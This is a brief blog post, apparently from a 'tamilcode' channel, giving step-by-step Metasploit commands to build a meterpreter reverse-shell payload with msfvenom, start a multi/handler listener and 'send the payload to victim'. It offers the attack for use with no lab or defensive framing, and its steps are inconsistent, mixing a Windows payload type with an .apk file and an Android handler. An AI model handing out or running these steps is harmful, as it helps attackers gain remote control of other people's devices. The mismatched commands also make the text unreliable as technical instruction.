metaploit tamilcode

                               WELCOME TO TAMILCODE


HERE IS TRICKS AND TECHNOLOGY


OPEN THE TERMINAL IN THE KALI LINUX





STEP 1  msfconsole


STEP 2  now we want create the payload

 msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= portnumber  R>filename.apk


STEP 3   now payload will be generate



STEP 4     use exploit/multi/handler


STEP 5   set payload android/meterpreter/reverse_tcp


STEP 6  set LHOST yourip


STEP 7  set LPORT   2734


STEP 8   run


server started now

send the payload  to victim


i hope that you will be understand and please subscribe tamilcode

Post a Comment

0 Comments